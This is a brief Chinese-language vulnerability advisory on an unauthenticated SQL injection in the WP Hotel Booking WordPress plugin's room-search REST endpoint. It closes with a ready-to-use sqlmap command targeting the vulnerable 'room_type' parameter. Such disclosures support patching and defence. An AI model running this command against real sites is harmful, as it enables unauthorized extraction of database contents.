WP Hotel Booking <= 2.1.0 - 未认证SQL注入
WP Hotel Booking WordPress插件在所有版本(包括2.1.0)中,通过REST API端点/wphb/v1/rooms/search-rooms的'room_type'参数存在SQL注入漏洞,原因是用户提供的参数未充分转义且现有SQL查询缺乏充分预处理。这使得未认证攻击者能够将额外的SQL查询附加到已有查询中,从而从数据库中提取敏感信息。
sqlmap -u 'https://www.target.com/wp-json/wphb/v1/rooms/search-rooms?check_in_date=2025-01-01&check_out_date=2025-01-10&adults=4&max_child=0&paged=1&room_type=standard' --dbms='MySQL ' --random-agent